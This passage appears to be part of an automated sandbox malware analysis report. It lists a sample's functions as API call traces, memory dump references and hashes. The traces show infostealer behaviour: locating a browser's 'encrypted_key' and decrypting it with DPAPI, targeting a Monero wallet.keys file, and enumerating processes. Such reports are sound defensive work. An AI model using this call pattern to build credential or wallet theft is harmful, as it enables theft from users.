                            • Associated: 00000000.00000002.2066102720.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000ABE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AE4000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AED000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066766624.0000000000AFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066926682.0000000000CA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066949840.0000000000CA3000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_5f0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrlen
                            • String ID:
                            • API String ID: 367037083-0
                            • Opcode ID: f69c774ce94a6f54efaa07c71f5a475236e921d191d12da43597d6257073b0bf
                            • Instruction ID: 1ace54654866d1be962fcf58be77e09b95d5e2bbbd74f086dace84c8834f185e
                            • Opcode Fuzzy Hash: f69c774ce94a6f54efaa07c71f5a475236e921d191d12da43597d6257073b0bf
                            • Instruction Fuzzy Hash: 0D415C75D50209AFDF08EFE4D845AEFB77AAB44304F008418E412762D0EB75AA46CFA6
                            Function 005F9CE0 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 98COMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 0060A740: lstrcpy.KERNEL32(00610E17,00000000), ref: 0060A788
                              • Part of subcall function 005F99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 005F99EC
                              • Part of subcall function 005F99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 005F9A11
                              • Part of subcall function 005F99C0: LocalAlloc.KERNEL32(00000040,?), ref: 005F9A31
                              • Part of subcall function 005F99C0: ReadFile.KERNEL32(000000FF,?,00000000,005F148F,00000000), ref: 005F9A5A
                              • Part of subcall function 005F99C0: LocalFree.KERNEL32(005F148F), ref: 005F9A90
                              • Part of subcall function 005F99C0: CloseHandle.KERNEL32(000000FF), ref: 005F9A9A
                              • Part of subcall function 00608E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00608E52
                            • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 005F9D39
                              • Part of subcall function 005F9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N_,00000000,00000000), ref: 005F9AEF
                              • Part of subcall function 005F9AC0: LocalAlloc.KERNEL32(00000040,?,?,?,005F4EEE,00000000,?), ref: 005F9B01
                              • Part of subcall function 005F9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N_,00000000,00000000), ref: 005F9B2A
                              • Part of subcall function 005F9AC0: LocalFree.KERNEL32(?,?,?,?,005F4EEE,00000000,?), ref: 005F9B3F
                              • Part of subcall function 005F9B60: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 005F9B84
                              • Part of subcall function 005F9B60: LocalAlloc.KERNEL32(00000040,00000000), ref: 005F9BA3
                              • Part of subcall function 005F9B60: LocalFree.KERNEL32(?), ref: 005F9BD3
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2064798922.00000000005F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true
                            • Associated: 00000000.00000002.2064736713.00000000005F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.000000000083A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.000000000084E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000ABE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AE4000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AED000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066766624.0000000000AFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066926682.0000000000CA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066949840.0000000000CA3000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_5f0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
                            • String ID: $"encrypted_key":"$DPAPI
                            • API String ID: 2100535398-738592651
                            • Opcode ID: a512c5286a779967e69f6c4e28042d8f6b09c6ebd5e3154bd6e641335abf4e00
                            • Instruction ID: c56094e355ff2405e4fb4f40a69a141f019fe9636d6c81e1db5988718b403f4f
                            • Opcode Fuzzy Hash: a512c5286a779967e69f6c4e28042d8f6b09c6ebd5e3154bd6e641335abf4e00
                            • Instruction Fuzzy Hash: 363110B5D1020DABCB04EBE4DC85BFFBBB9BB48304F144519EA05A7241E7349A44CBA5
                            Function 00608680 Relevance: 6.1, APIs: 4, Instructions: 77processCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 0060A740: lstrcpy.KERNEL32(00610E17,00000000), ref: 0060A788
                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,006105B7), ref: 006086CA
                            • Process32First.KERNEL32(?,00000128), ref: 006086DE
                            • Process32Next.KERNEL32(?,00000128), ref: 006086F3
                              • Part of subcall function 0060A9B0: lstrlen.KERNEL32(?,01408AA0,?,\Monero\wallet.keys,00610E17), ref: 0060A9C5
                              • Part of subcall function 0060A9B0: lstrcpy.KERNEL32(00000000), ref: 0060AA04
                              • Part of subcall function 0060A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0060AA12
                              • Part of subcall function 0060A8A0: lstrcpy.KERNEL32(?,00610E17), ref: 0060A905
                            • CloseHandle.KERNEL32(?), ref: 00608761
                            Memory Dump Source
                            • Source File: 00000000.00000002.2064798922.00000000005F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true
                            • Associated: 00000000.00000002.2064736713.00000000005F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.000000000083A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.000000000084E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000ABE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AE4000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AED000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066766624.0000000000AFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066926682.0000000000CA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066949840.0000000000CA3000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_5f0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                            • String ID:
                            • API String ID: 1066202413-0
                            • Opcode ID: 36de9ed0d4310b187b7429ee43a8027356eeddd3f82d7556216797b4e9dd9c89
                            • Instruction ID: 9c4ee332ff7790cb19471bafea92026ebb86b64db4aa09647db03f88bc7fc7b9
                            • Opcode Fuzzy Hash: 36de9ed0d4310b187b7429ee43a8027356eeddd3f82d7556216797b4e9dd9c89
                            • Instruction Fuzzy Hash: 46315971951218ABDB68DB90CC85FEFB77AFB44740F1085A9A10AA21E0DB706A45CFA1
                            Function 00607980 Relevance: 6.1, APIs: 4, Instructions: 51memorytimeCOMMON
                            Download Yara Rule
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00610E00,00000000,?), ref: 006079B0
                            • RtlAllocateHeap.NTDLL(00000000), ref: 006079B7
                            • GetLocalTime.KERNEL32(?,?,?,?,?,00610E00,00000000,?), ref: 006079C4
                            • wsprintfA.USER32 ref: 006079F3
                            Memory Dump Source
                            • Source File: 00000000.00000002.2064798922.00000000005F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true
                            • Associated: 00000000.00000002.2064736713.00000000005F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.000000000083A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.000000000084E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000ABE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AE4000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AED000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066766624.0000000000AFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066926682.0000000000CA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066949840.0000000000CA3000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_5f0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateLocalProcessTimewsprintf
                            • String ID:
                            • API String ID: 377395780-0
                            • Opcode ID: bd3f2f12a224ee21e3dbb505ed25a81bf06b8b2ef5402784fefc82fc11826a05
                            • Instruction ID: c5deaeb271ee4cb99ec33198759170a81e2dcff184c5119a2be937f00b7bac93
                            • Opcode Fuzzy Hash: bd3f2f12a224ee21e3dbb505ed25a81bf06b8b2ef5402784fefc82fc11826a05
                            • Instruction Fuzzy Hash: 981115B2944118AACB18DFC9DD45BBEB7F8FB88B11F10461AF645A2280E2395940CBB1
                            Function 0060C742 Relevance: 6.0, APIs: 4, Instructions: 34COMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            • __getptd.LIBCMT ref: 0060C74E
                              • Part of subcall function 0060BF9F: __amsg_exit.LIBCMT ref: 0060BFAF
                            • __getptd.LIBCMT ref: 0060C765
                            • __amsg_exit.LIBCMT ref: 0060C773
                            • __updatetlocinfoEx_nolock.LIBCMT ref: 0060C797
                            Memory Dump Source
                            • Source File: 00000000.00000002.2064798922.00000000005F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true
                            • Associated: 00000000.00000002.2064736713.00000000005F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.000000000083A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.000000000084E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000ABE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AE4000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AED000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066766624.0000000000AFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066926682.0000000000CA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066949840.0000000000CA3000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_5f0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                            • String ID:
                            • API String ID: 300741435-0
                            • Opcode ID: 4af147fd92ea2897101573cbf0fd03a02626143419257a7fd5e947578d60aa72
                            • Instruction ID: 5596c2079e8d225937d570685be368a55add23e6e7896eb405e20ac2a6935351
                            • Opcode Fuzzy Hash: 4af147fd92ea2897101573cbf0fd03a02626143419257a7fd5e947578d60aa72
                            • Instruction Fuzzy Hash: E0F090329C07019BD7A8BFB85807B8F33A3AF00730F24924DF415A72D2DB6459419E5E
                            Function 00604F40 Relevance: 5.1, APIs: 4, Instructions: 70stringCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 00608DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00608E0B
                            • lstrcat.KERNEL32(?,00000000), ref: 00604F7A
                            • lstrcat.KERNEL32(?,00611070), ref: 00604F97
                            • lstrcat.KERNEL32(?,01408B70), ref: 00604FAB
                            • lstrcat.KERNEL32(?,00611074), ref: 00604FBD
                              • Part of subcall function 00604910: wsprintfA.USER32 ref: 0060492C
                              • Part of subcall function 00604910: FindFirstFileA.KERNEL32(?,?), ref: 00604943
                              • Part of subcall function 00604910: StrCmpCA.SHLWAPI(?,00610FDC), ref: 00604971
                              • Part of subcall function 00604910: StrCmpCA.SHLWAPI(?,00610FE0), ref: 00604987
                              • Part of subcall function 00604910: FindNextFileA.KERNEL32(000000FF,?), ref: 00604B7D
                              • Part of subcall function 00604910: FindClose.KERNEL32(000000FF), ref: 00604B92
                            Memory Dump Source
                            • Source File: 00000000.00000002.2064798922.00000000005F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true
                            • Associated: 00000000.00000002.2064736713.00000000005F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.000000000083A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.000000000084E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000ABE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AE4000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AED000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066766624.0000000000AFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066926682.0000000000CA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066949840.0000000000CA3000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_5f0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                            • String ID:
                            • API String ID: 2667927680-0
                            • Opcode ID: 665daac4ba21e870186917f01ded518f35694624433468d330051da67c182a1f
                            • Instruction ID: d545b419ce1de1891b247de87510c22b1713bf70c5e9bef6de8a7ff7542bb51b
                            • Opcode Fuzzy Hash: 665daac4ba21e870186917f01ded518f35694624433468d330051da67c182a1f
                            • Instruction Fuzzy Hash: B5219B76940208ABC758F7B0DC46EEA333DBB94300F004958B6DA571C1EE7596C88F96